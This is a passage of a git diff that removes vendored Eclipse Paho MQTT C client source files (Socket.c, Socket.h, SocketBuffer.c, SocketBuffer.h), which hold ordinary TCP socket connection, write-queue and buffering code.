-int Socket_putdatas(int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees)
-{
-	unsigned long bytes = 0L;
-	iobuf iovecs[5];
-	int frees1[5];
-	int rc = TCPSOCKET_INTERRUPTED, i;
-	size_t total = buf0len;
-
-	FUNC_ENTRY;
-	if (!Socket_noPendingWrites(socket))
-	{
-		Log(LOG_SEVERE, -1, "Trying to write to socket %d for which there is already pending output", socket);
-		rc = SOCKET_ERROR;
-		goto exit;
-	}
-
-	for (i = 0; i < count; i++)
-		total += buflens[i];
-
-	iovecs[0].iov_base = buf0;
-	iovecs[0].iov_len = (ULONG)buf0len;
-	frees1[0] = 1;
-	for (i = 0; i < count; i++)
-	{
-		iovecs[i+1].iov_base = buffers[i];
-		iovecs[i+1].iov_len = (ULONG)buflens[i];
-		frees1[i+1] = frees[i];
-	}
-
-	if ((rc = Socket_writev(socket, iovecs, count+1, &bytes)) != SOCKET_ERROR)
-	{
-		if (bytes == total)
-			rc = TCPSOCKET_COMPLETE;
-		else
-		{
-			int* sockmem = (int*)malloc(sizeof(int));
-			Log(TRACE_MIN, -1, "Partial write: %ld bytes of %d actually written on socket %d",
-					bytes, total, socket);
-#if defined(OPENSSL)
-			SocketBuffer_pendingWrite(socket, NULL, count+1, iovecs, frees1, total, bytes);
-#else
-			SocketBuffer_pendingWrite(socket, count+1, iovecs, frees1, total, bytes);
-#endif
-			*sockmem = socket;
-			ListAppend(s.write_pending, sockmem, sizeof(int));
-			FD_SET(socket, &(s.pending_wset));
-			rc = TCPSOCKET_INTERRUPTED;
-		}
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Add a socket to the pending write list, so that it is checked for writing in select.  This is used
- *  in connect processing when the TCP connect is incomplete, as we need to check the socket for both
- *  ready to read and write states.
- *  @param socket the socket to add
- */
-void Socket_addPendingWrite(int socket)
-{
-	FD_SET(socket, &(s.pending_wset));
-}
-
-
-/**
- *  Clear a socket from the pending write list - if one was added with Socket_addPendingWrite
- *  @param socket the socket to remove
- */
-void Socket_clearPendingWrite(int socket)
-{
-	if (FD_ISSET(socket, &(s.pending_wset)))
-		FD_CLR(socket, &(s.pending_wset));
-}
-
-
-/**
- *  Close a socket without removing it from the select list.
- *  @param socket the socket to close
- *  @return completion code
- */
-int Socket_close_only(int socket)
-{
-	int rc;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	if (shutdown(socket, SD_BOTH) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = closesocket(socket)) == SOCKET_ERROR)
-		Socket_error("close", socket);
-#else
-	if (shutdown(socket, SHUT_WR) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = recv(socket, NULL, (size_t)0, 0)) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = close(socket)) == SOCKET_ERROR)
-		Socket_error("close", socket);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Close a socket and remove it from the select list.
- *  @param socket the socket to close
- *  @return completion code
- */
-void Socket_close(int socket)
-{
-	FUNC_ENTRY;
-	Socket_close_only(socket);
-	FD_CLR(socket, &(s.rset_saved));
-	if (FD_ISSET(socket, &(s.pending_wset)))
-		FD_CLR(socket, &(s.pending_wset));
-	if (s.cur_clientsds != NULL && *(int*)(s.cur_clientsds->content) == socket)
-		s.cur_clientsds = s.cur_clientsds->next;
-	ListRemoveItem(s.connect_pending, &socket, intcompare);
-	ListRemoveItem(s.write_pending, &socket, intcompare);
-	SocketBuffer_cleanup(socket);
-
-	if (ListRemoveItem(s.clientsds, &socket, intcompare))
-		Log(TRACE_MIN, -1, "Removed socket %d", socket);
-	else
-		Log(LOG_ERROR, -1, "Failed to remove socket %d", socket);
-	if (socket + 1 >= s.maxfdp1)
-	{
-		/* now we have to reset s.maxfdp1 */
-		ListElement* cur_clientsds = NULL;
-
-		s.maxfdp1 = 0;
-		while (ListNextElement(s.clientsds, &cur_clientsds))
-			s.maxfdp1 = max(*((int*)(cur_clientsds->content)), s.maxfdp1);
-		++(s.maxfdp1);
-		Log(TRACE_MAX, -1, "Reset max fdp1 to %d", s.maxfdp1);
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- *  Create a new socket and TCP connect to an address/port
- *  @param addr the address string
- *  @param port the TCP port
- *  @param sock returns the new socket
- *  @return completion code
- */
-int Socket_new(char* addr, int port, int* sock)
-{
-	int type = SOCK_STREAM;
-	struct sockaddr_in address;
-#if defined(AF_INET6)
-	struct sockaddr_in6 address6;
-#endif
-	int rc = SOCKET_ERROR;
-#if defined(WIN32) || defined(WIN64)
-	short family;
-#else
-	sa_family_t family = AF_INET;
-#endif
-	struct addrinfo *result = NULL;
-	struct addrinfo hints = {0, AF_UNSPEC, SOCK_STREAM, IPPROTO_TCP, 0, NULL, NULL, NULL};
-
-	FUNC_ENTRY;
-	*sock = -1;
-	memset(&address6, '\0', sizeof(address6));
-
-	if (addr[0] == '[')
-	  ++addr;
-
-	if ((rc = getaddrinfo(addr, NULL, &hints, &result)) == 0)
-	{
-		struct addrinfo* res = result;
-
-		while (res)
-		{	/* prefer ip4 addresses */
-			if (res->ai_family == AF_INET || res->ai_next == NULL)
-				break;
-			res = res->ai_next;
-		}
-
-		if (res == NULL)
-			rc = -1;
-		else
-#if defined(AF_INET6)
-		if (res->ai_family == AF_INET6)
-		{
-			address6.sin6_port = htons(port);
-			address6.sin6_family = family = AF_INET6;
-			memcpy(&address6.sin6_addr, &((struct sockaddr_in6*)(res->ai_addr))->sin6_addr, sizeof(address6.sin6_addr));
-		}
-		else
-#endif
-		if (res->ai_family == AF_INET)
-		{
-			address.sin_port = htons(port);
-			address.sin_family = family = AF_INET;
-			address.sin_addr = ((struct sockaddr_in*)(res->ai_addr))->sin_addr;
-		}
-		else
-			rc = -1;
-
-		freeaddrinfo(result);
-	}
-	else
-	  	Log(LOG_ERROR, -1, "getaddrinfo failed for addr %s with rc %d", addr, rc);
-
-	if (rc != 0)
-		Log(LOG_ERROR, -1, "%s is not a valid IP address", addr);
-	else
-	{
-		*sock =	(int)socket(family, type, 0);
-		if (*sock == INVALID_SOCKET)
-			rc = Socket_error("socket", *sock);
-		else
-		{
-#if defined(NOSIGPIPE)
-			int opt = 1;
-
-			if (setsockopt(*sock, SOL_SOCKET, SO_NOSIGPIPE, (void*)&opt, sizeof(opt)) != 0)
-				Log(LOG_ERROR, -1, "Could not set SO_NOSIGPIPE for socket %d", *sock);
-#endif
-
-			Log(TRACE_MIN, -1, "New socket %d for %s, port %d",	*sock, addr, port);
-			if (Socket_addSocket(*sock) == SOCKET_ERROR)
-				rc = Socket_error("addSocket", *sock);
-			else
-			{
-				/* this could complete immmediately, even though we are non-blocking */
-				if (family == AF_INET)
-					rc = connect(*sock, (struct sockaddr*)&address, sizeof(address));
-	#if defined(AF_INET6)
-				else
-					rc = connect(*sock, (struct sockaddr*)&address6, sizeof(address6));
-	#endif
-				if (rc == SOCKET_ERROR)
-					rc = Socket_error("connect", *sock);
-				if (rc == EINPROGRESS || rc == EWOULDBLOCK)
-				{
-					int* pnewSd = (int*)malloc(sizeof(int));
-					*pnewSd = *sock;
-					ListAppend(s.connect_pending, pnewSd, sizeof(int));
-					Log(TRACE_MIN, 15, "Connect pending");
-				}
-			}
-                        /* Prevent socket leak by closing unusable sockets,
-                         * as reported in
-                         * https://github.com/eclipse/paho.mqtt.c/issues/135
-                         */
-                        if (rc != 0 && (rc != EINPROGRESS) && (rc != EWOULDBLOCK))
-                        {
-                            Socket_close(*sock); /* close socket and remove from our list of sockets */
-                            *sock = -1; /* as initialized before */
-                        }
-		}
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static Socket_writeComplete* writecomplete = NULL;
-
-void Socket_setWriteCompleteCallback(Socket_writeComplete* mywritecomplete)
-{
-	writecomplete = mywritecomplete;
-}
-
-/**
- *  Continue an outstanding write for a particular socket
- *  @param socket that socket
- *  @return completion code
- */
-int Socket_continueWrite(int socket)
-{
-	int rc = 0;
-	pending_writes* pw;
-	unsigned long curbuflen = 0L, /* cumulative total of buffer lengths */
-		bytes;
-	int curbuf = -1, i;
-	iobuf iovecs1[5];
-
-	FUNC_ENTRY;
-	pw = SocketBuffer_getWrite(socket);
-
-#if defined(OPENSSL)
-	if (pw->ssl)
-	{
-		rc = SSLSocket_continueWrite(pw);
-		goto exit;
-	}
-#endif
-
-	for (i = 0; i < pw->count; ++i)
-	{
-		if (pw->bytes <= curbuflen)
-		{ /* if previously written length is less than the buffer we are currently looking at,
-				add the whole buffer */
-			iovecs1[++curbuf].iov_len = pw->iovecs[i].iov_len;
-			iovecs1[curbuf].iov_base = pw->iovecs[i].iov_base;
-		}
-		else if (pw->bytes < curbuflen + pw->iovecs[i].iov_len)
-		{ /* if previously written length is in the middle of the buffer we are currently looking at,
-				add some of the buffer */
-			size_t offset = pw->bytes - curbuflen;
-			iovecs1[++curbuf].iov_len = pw->iovecs[i].iov_len - (ULONG)offset;
-			iovecs1[curbuf].iov_base = (char*)pw->iovecs[i].iov_base + offset;
-			break;
-		}
-		curbuflen += pw->iovecs[i].iov_len;
-	}
-
-	if ((rc = Socket_writev(socket, iovecs1, curbuf+1, &bytes)) != SOCKET_ERROR)
-	{
-		pw->bytes += bytes;
-		if ((rc = (pw->bytes == pw->total)))
-		{  /* topic and payload buffers are freed elsewhere, when all references to them have been removed */
-			for (i = 0; i < pw->count; i++)
-			{
-				if (pw->frees[i])
-					free(pw->iovecs[i].iov_base);
-			}
-			Log(TRACE_MIN, -1, "ContinueWrite: partial write now complete for socket %d", socket);
-		}
-		else
-			Log(TRACE_MIN, -1, "ContinueWrite wrote +%lu bytes on socket %d", bytes, socket);
-	}
-#if defined(OPENSSL)
-exit:
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Continue any outstanding writes for a socket set
- *  @param pwset the set of sockets
- *  @return completion code
- */
-int Socket_continueWrites(fd_set* pwset)
-{
-	int rc1 = 0;
-	ListElement* curpending = s.write_pending->first;
-
-	FUNC_ENTRY;
-	while (curpending)
-	{
-		int socket = *(int*)(curpending->content);
-		if (FD_ISSET(socket, pwset) && Socket_continueWrite(socket))
-		{
-			if (!SocketBuffer_writeComplete(socket))
-				Log(LOG_SEVERE, -1, "Failed to remove pending write from socket buffer list");
-			FD_CLR(socket, &(s.pending_wset));
-			if (!ListRemove(s.write_pending, curpending->content))
-			{
-				Log(LOG_SEVERE, -1, "Failed to remove pending write from list");
-				ListNextElement(s.write_pending, &curpending);
-			}
-			curpending = s.write_pending->current;
-
-			if (writecomplete)
-				(*writecomplete)(socket);
-		}
-		else
-			ListNextElement(s.write_pending, &curpending);
-	}
-	FUNC_EXIT_RC(rc1);
-	return rc1;
-}
-
-
-/**
- *  Convert a numeric address to character string
- *  @param sa	socket numerical address
- *  @param sock socket
- *  @return the peer information
- */
-char* Socket_getaddrname(struct sockaddr* sa, int sock)
-{
-/**
- * maximum length of the address string
- */
-#define ADDRLEN INET6_ADDRSTRLEN+1
-/**
- * maximum length of the port string
- */
-#define PORTLEN 10
-	static char addr_string[ADDRLEN + PORTLEN];
-
-#if defined(WIN32) || defined(WIN64)
-	int buflen = ADDRLEN*2;
-	wchar_t buf[ADDRLEN*2];
-	if (WSAAddressToStringW(sa, sizeof(struct sockaddr_in6), NULL, buf, (LPDWORD)&buflen) == SOCKET_ERROR)
-		Socket_error("WSAAddressToString", sock);
-	else
-		wcstombs(addr_string, buf, sizeof(addr_string));
-	/* TODO: append the port information - format: [00:00:00::]:port */
-	/* strcpy(&addr_string[strlen(addr_string)], "what?"); */
-#else
-	struct sockaddr_in *sin = (struct sockaddr_in *)sa;
-	inet_ntop(sin->sin_family, &sin->sin_addr, addr_string, ADDRLEN);
-	sprintf(&addr_string[strlen(addr_string)], ":%d", ntohs(sin->sin_port));
-#endif
-	return addr_string;
-}
-
-
-/**
- *  Get information about the other end connected to a socket
- *  @param sock the socket to inquire on
- *  @return the peer information
- */
-char* Socket_getpeer(int sock)
-{
-	struct sockaddr_in6 sa;
-	socklen_t sal = sizeof(sa);
-	int rc;
-
-	if ((rc = getpeername(sock, (struct sockaddr*)&sa, &sal)) == SOCKET_ERROR)
-	{
-		Socket_error("getpeername", sock);
-		return "unknown";
-	}
-
-	return Socket_getaddrname((struct sockaddr*)&sa, sock);
-}
-
-
-#if defined(Socket_TEST)
-
-int main(int argc, char *argv[])
-{
-	Socket_connect("127.0.0.1", 1883);
-	Socket_connect("localhost", 1883);
-	Socket_connect("loadsadsacalhost", 1883);
-}
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Socket.h b/thirdparty/paho.mqtt.c/src/Socket.h
deleted file mode 100644
index dbf21b4..0000000
--- a/thirdparty/paho.mqtt.c/src/Socket.h
+++ /dev/null
@@ -1,143 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs - async client updates
- *******************************************************************************/
-
-#if !defined(SOCKET_H)
-#define SOCKET_H
-
-#include <sys/types.h>
-
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#define MAXHOSTNAMELEN 256
-#if !defined(SSLSOCKET_H)
-#undef EAGAIN
-#define EAGAIN WSAEWOULDBLOCK
-#undef EINTR
-#define EINTR WSAEINTR
-#undef EINPROGRESS
-#define EINPROGRESS WSAEINPROGRESS
-#undef EWOULDBLOCK
-#define EWOULDBLOCK WSAEWOULDBLOCK
-#undef ENOTCONN
-#define ENOTCONN WSAENOTCONN
-#undef ECONNRESET
-#define ECONNRESET WSAECONNRESET
-#undef ETIMEDOUT
-#define ETIMEDOUT WAIT_TIMEOUT
-#endif
-#define ioctl ioctlsocket
-#define socklen_t int
-#else
-#define INVALID_SOCKET SOCKET_ERROR
-#include <sys/socket.h>
-#if !defined(_WRS_KERNEL)
-#include <sys/param.h>
-#include <sys/time.h>
-#include <sys/select.h>
-#include <sys/uio.h>
-#else
-#include <selectLib.h>
-#endif
-#include <netinet/in.h>
-#include <netinet/tcp.h>
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <stdio.h>
-#include <unistd.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <unistd.h>
-#define ULONG size_t
-#endif
-
-/** socket operation completed successfully */
-#define TCPSOCKET_COMPLETE 0
-#if !defined(SOCKET_ERROR)
-	/** error in socket operation */
-	#define SOCKET_ERROR -1
-#endif
-/** must be the same as SOCKETBUFFER_INTERRUPTED */
-#define TCPSOCKET_INTERRUPTED -22
-#define SSL_FATAL -3
-
-#if !defined(INET6_ADDRSTRLEN)
-#define INET6_ADDRSTRLEN 46 /** only needed for gcc/cygwin on windows */
-#endif
-
-
-#if !defined(max)
-#define max(A,B) ( (A) > (B) ? (A):(B))
-#endif
-
-#include "LinkedList.h"
-
-/*BE
-def FD_SET
-{
-   128 n8 "data"
-}
-
-def SOCKETS
-{
-	FD_SET "rset"
-	FD_SET "rset_saved"
-	n32 dec "maxfdp1"
-	n32 ptr INTList "clientsds"
-	n32 ptr INTItem "cur_clientsds"
-	n32 ptr INTList "connect_pending"
-	n32 ptr INTList "write_pending"
-	FD_SET "pending_wset"
-}
-BE*/
-
-
-/**
- * Structure to hold all socket data for the module
- */
-typedef struct
-{
-	fd_set rset, /**< socket read set (see select doc) */
-		rset_saved; /**< saved socket read set */
-	int maxfdp1; /**< max descriptor used +1 (again see select doc) */
-	List* clientsds; /**< list of client socket descriptors */
-	ListElement* cur_clientsds; /**< current client socket descriptor (iterator) */
-	List* connect_pending; /**< list of sockets for which a connect is pending */
-	List* write_pending; /**< list of sockets for which a write is pending */
-	fd_set pending_wset; /**< socket pending write set for select */
-} Sockets;
-
-
-void Socket_outInitialize(void);
-void Socket_outTerminate(void);
-int Socket_getReadySocket(int more_work, struct timeval *tp);
-int Socket_getch(int socket, char* c);
-char *Socket_getdata(int socket, size_t bytes, size_t* actual_len);
-int Socket_putdatas(int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees);
-void Socket_close(int socket);
-int Socket_new(char* addr, int port, int* socket);
-
-int Socket_noPendingWrites(int socket);
-char* Socket_getpeer(int sock);
-
-void Socket_addPendingWrite(int socket);
-void Socket_clearPendingWrite(int socket);
-
-typedef void Socket_writeComplete(int socket);
-void Socket_setWriteCompleteCallback(Socket_writeComplete*);
-
-#endif /* SOCKET_H */
diff --git a/thirdparty/paho.mqtt.c/src/SocketBuffer.c b/thirdparty/paho.mqtt.c/src/SocketBuffer.c
deleted file mode 100644
index ba640f1..0000000
--- a/thirdparty/paho.mqtt.c/src/SocketBuffer.c
+++ /dev/null
@@ -1,413 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for issue #244, issue #20
- *******************************************************************************/
-
-/**
- * @file
- * \brief Socket buffering related functions
- *
- * Some other related functions are in the Socket module
- */
-#include "SocketBuffer.h"
-#include "LinkedList.h"
-#include "Log.h"
-#include "Messages.h"
-#include "StackTrace.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Default input queue buffer
- */
-static socket_queue* def_queue;
-
-/**
- * List of queued input buffers
- */
-static List* queues;
-
-/**
- * List of queued write buffers
- */
-static List writes;
-
-
-int socketcompare(void* a, void* b);
-void SocketBuffer_newDefQ(void);
-void SocketBuffer_freeDefQ(void);
-int pending_socketcompare(void* a, void* b);
-
-
-/**
- * List callback function for comparing socket_queues by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int socketcompare(void* a, void* b)
-{
-	return ((socket_queue*)a)->socket == *(int*)b;
-}
-
-
-/**
- * Create a new default queue when one has just been used.
- */
-void SocketBuffer_newDefQ(void)
-{
-	def_queue = malloc(sizeof(socket_queue));
-	def_queue->buflen = 1000;
-	def_queue->buf = malloc(def_queue->buflen);
-	def_queue->socket = def_queue->index = 0;
-	def_queue->buflen = def_queue->datalen = 0;
-}
-
-
-/**
- * Initialize the socketBuffer module
- */
-void SocketBuffer_initialize(void)
-{
-	FUNC_ENTRY;
-	SocketBuffer_newDefQ();
-	queues = ListInitialize();
-	ListZero(&writes);
-	FUNC_EXIT;
-}
-
-
-/**
- * Free the default queue memory
- */
-void SocketBuffer_freeDefQ(void)
-{
-	free(def_queue->buf);
-	free(def_queue);
-}
-
-
-/**
- * Terminate the socketBuffer module
- */
-void SocketBuffer_terminate(void)
-{
-	ListElement* cur = NULL;
-	ListEmpty(&writes);
-
-	FUNC_ENTRY;
-	while (ListNextElement(queues, &cur))
-		free(((socket_queue*)(cur->content))->buf);
-	ListFree(queues);
-	SocketBuffer_freeDefQ();
-	FUNC_EXIT;
-}
-
-
-/**
- * Cleanup any buffers for a specific socket
- * @param socket the socket to clean up
- */
-void SocketBuffer_cleanup(int socket)
-{
-	FUNC_ENTRY;
-	SocketBuffer_writeComplete(socket); /* clean up write buffers */
-	if (ListFindItem(queues, &socket, socketcompare))
-	{
-		free(((socket_queue*)(queues->current->content))->buf);
-		ListRemove(queues, queues->current->content);
-	}
-	if (def_queue->socket == socket)
-	{
-		def_queue->socket = def_queue->index = 0;
-		def_queue->headerlen = def_queue->datalen = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * Get any queued data for a specific socket
- * @param socket the socket to get queued data for
- * @param bytes the number of bytes of data to retrieve
- * @param actual_len the actual length returned
- * @return the actual data
- */
-char* SocketBuffer_getQueuedData(int socket, size_t bytes, size_t* actual_len)
-{
-	socket_queue* queue = NULL;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{  /* if there is queued data for this socket, add any data read to it */
-		queue = (socket_queue*)(queues->current->content);
-		*actual_len = queue->datalen;
-	}
-	else
-	{
-		*actual_len = 0;
-		queue = def_queue;
-	}
-	if (bytes > queue->buflen)
-	{
-		if (queue->datalen > 0)
-		{
-			void* newmem = malloc(bytes);
-			memcpy(newmem, queue->buf, queue->datalen);
-			free(queue->buf);
-			queue->buf = newmem;
-		}
-		else
-			queue->buf = realloc(queue->buf, bytes);
-		queue->buflen = bytes;
-	}
-
-	FUNC_EXIT;
-	return queue->buf;
-}
-
-
-/**
- * Get any queued character for a specific socket
- * @param socket the socket to get queued data for
- * @param c the character returned if any
- * @return completion code
- */
-int SocketBuffer_getQueuedChar(int socket, char* c)
-{
-	int rc = SOCKETBUFFER_INTERRUPTED;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{  /* if there is queued data for this socket, read that first */
-		socket_queue* queue = (socket_queue*)(queues->current->content);
-		if (queue->index < queue->headerlen)
-		{
-			*c = queue->fixed_header[(queue->index)++];
-			Log(TRACE_MAX, -1, "index is now %d, headerlen %d", queue->index, queue->headerlen);
-			rc = SOCKETBUFFER_COMPLETE;
-			goto exit;
-		}
-		else if (queue->index > 4)
-		{
-			Log(LOG_FATAL, -1, "header is already at full length");
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;  /* there was no queued char if rc is SOCKETBUFFER_INTERRUPTED*/
-}
-
-
-/**
- * A socket read was interrupted so we need to queue data
- * @param socket the socket to get queued data for
- * @param actual_len the actual length of data that was read
- */
-void SocketBuffer_interrupted(int socket, size_t actual_len)
-{
-	socket_queue* queue = NULL;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-		queue = (socket_queue*)(queues->current->content);
-	else /* new saved queue */
-	{
-		queue = def_queue;
-		/* if SocketBuffer_queueChar() has not yet been called, then the socket number
-		  in def_queue will not have been set.  Issue #244.
-		  If actual_len == 0 then we may not need to do anything - I'll leave that
-		  optimization for another time. */
-		queue->socket = socket;
-		ListAppend(queues, def_queue, sizeof(socket_queue)+def_queue->buflen);
-		SocketBuffer_newDefQ();
-	}
-	queue->index = 0;
-	queue->datalen = actual_len;
-	FUNC_EXIT;
-}
-
-
-/**
- * A socket read has now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @return pointer to the default queue data
- */
-char* SocketBuffer_complete(int socket)
-{
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{
-		socket_queue* queue = (socket_queue*)(queues->current->content);
-		SocketBuffer_freeDefQ();
-		def_queue = queue;
-		ListDetach(queues, queue);
-	}
-	def_queue->socket = def_queue->index = 0;
-	def_queue->headerlen = def_queue->datalen = 0;
-	FUNC_EXIT;
-	return def_queue->buf;
-}
-
-
-/**
- * A socket operation had now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @param c the character to queue
- */
-void SocketBuffer_queueChar(int socket, char c)
-{
-	int error = 0;
-	socket_queue* curq = def_queue;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-		curq = (socket_queue*)(queues->current->content);
-	else if (def_queue->socket == 0)
-	{
-		def_queue->socket = socket;
-		def_queue->index = 0;
-		def_queue->datalen = 0;
-	}
-	else if (def_queue->socket != socket)
-	{
-		Log(LOG_FATAL, -1, "attempt to reuse socket queue");
-		error = 1;
-	}
-	if (curq->index > 4)
-	{
-		Log(LOG_FATAL, -1, "socket queue fixed_header field full");
-		error = 1;
-	}
-	if (!error)
-	{
-		curq->fixed_header[(curq->index)++] = c;
-		curq->headerlen = curq->index;
-	}
-	Log(TRACE_MAX, -1, "queueChar: index is now %d, headerlen %d", curq->index, curq->headerlen);
-	FUNC_EXIT;
-}
-
-
-/**
- * A socket write was interrupted so store the remaining data
- * @param socket the socket for which the write was interrupted
- * @param count the number of iovec buffers
- * @param iovecs buffer array
- * @param total total data length to be written
- * @param bytes actual data length that was written
- */
-#if defined(OPENSSL)
-void SocketBuffer_pendingWrite(int socket, SSL* ssl, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes)
-#else
-void SocketBuffer_pendingWrite(int socket, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes)
-#endif
-{
-	int i = 0;
-	pending_writes* pw = NULL;
-
-	FUNC_ENTRY;
-	/* store the buffers until the whole packet is written */
-	pw = malloc(sizeof(pending_writes));
-	pw->socket = socket;
-#if defined(OPENSSL)
-	pw->ssl = ssl;
-#endif
-	pw->bytes = bytes;
-	pw->total = total;
-	pw->count = count;
-	for (i = 0; i < count; i++)
-	{
-		pw->iovecs[i] = iovecs[i];
-		pw->frees[i] = frees[i];
-	}
-	ListAppend(&writes, pw, sizeof(pw) + total);
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing pending_writes by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int pending_socketcompare(void* a, void* b)
-{
-	return ((pending_writes*)a)->socket == *(int*)b;
-}
-
-
-/**
- * Get any queued write data for a specific socket
- * @param socket the socket to get queued data for
- * @return pointer to the queued data or NULL
- */
-pending_writes* SocketBuffer_getWrite(int socket)
-{
-	ListElement* le = ListFindItem(&writes, &socket, pending_socketcompare);
-	return (le) ? (pending_writes*)(le->content) : NULL;
-}
-
-
-/**
- * A socket write has now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @return completion code, boolean - was the queue removed?
- */
-int SocketBuffer_writeComplete(int socket)
-{
-	return ListRemoveItem(&writes, &socket, pending_socketcompare);
-}
-
-
-/**
- * Update the queued write data for a socket in the case of QoS 0 messages.
- * @param socket the socket for which the operation is now complete
- * @param topic the topic of the QoS 0 write
- * @param payload the payload of the QoS 0 write
- * @return pointer to the updated queued data structure, or NULL
- */
-pending_writes* SocketBuffer_updateWrite(int socket, char* topic, char* payload)
-{
-	pending_writes* pw = NULL;
-	ListElement* le = NULL;
-
-	FUNC_ENTRY;
-	if ((le = ListFindItem(&writes, &socket, pending_socketcompare)) != NULL)
-	{
-		pw = (pending_writes*)(le->content);
-		if (pw->count == 4)
-		{
-			pw->iovecs[2].iov_base = topic;
-			pw->iovecs[3].iov_base = payload;
-		}
-	}
-
-	FUNC_EXIT;
-	return pw;
-}
diff --git a/thirdparty/paho.mqtt.c/src/SocketBuffer.h b/thirdparty/paho.mqtt.c/src/SocketBuffer.h
deleted file mode 100644
index f7702dc..0000000
--- a/thirdparty/paho.mqtt.c/src/SocketBuffer.h
+++ /dev/null
@@ -1,84 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *******************************************************************************/
-
-#if !defined(SOCKETBUFFER_H)
-#define SOCKETBUFFER_H
-
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#else
-#include <sys/socket.h>
-#endif
-
-#if defined(OPENSSL)
-#include <openssl/ssl.h>
-#endif
-
-#if defined(WIN32) || defined(WIN64)
-	typedef WSABUF iobuf;
-#else
-	typedef struct iovec iobuf;
-#endif
-
-typedef struct
-{
-	int socket;
-	unsigned int index;
-	size_t headerlen;
-	char fixed_header[5];	/**< header plus up to 4 length bytes */
-	size_t buflen, 			/**< total length of the buffer */
-		datalen; 			/**< current length of data in buf */
-	char* buf;
-} socket_queue;
-
-typedef struct
-{
-	int socket, count;
-	size_t total;
-#if defined(OPENSSL)
-	SSL* ssl;
-#endif
-	size_t bytes;
-	iobuf iovecs[5];
-	int frees[5];
-} pending_writes;
-
-#define SOCKETBUFFER_COMPLETE 0
-#if !defined(SOCKET_ERROR)
-	#define SOCKET_ERROR -1
-#endif
-#define SOCKETBUFFER_INTERRUPTED -22 /* must be the same value as TCPSOCKET_INTERRUPTED */
-
-void SocketBuffer_initialize(void);
-void SocketBuffer_terminate(void);
-void SocketBuffer_cleanup(int socket);
-char* SocketBuffer_getQueuedData(int socket, size_t bytes, size_t* actual_len);
-int SocketBuffer_getQueuedChar(int socket, char* c);
-void SocketBuffer_interrupted(int socket, size_t actual_len);
-char* SocketBuffer_complete(int socket);
-void SocketBuffer_queueChar(int socket, char c);
-
-#if defined(OPENSSL)
-void SocketBuffer_pendingWrite(int socket, SSL* ssl, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes);
-#else
-void SocketBuffer_pendingWrite(int socket, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes);
-#endif
-pending_writes* SocketBuffer_getWrite(int socket);
-int SocketBuffer_writeComplete(int socket);
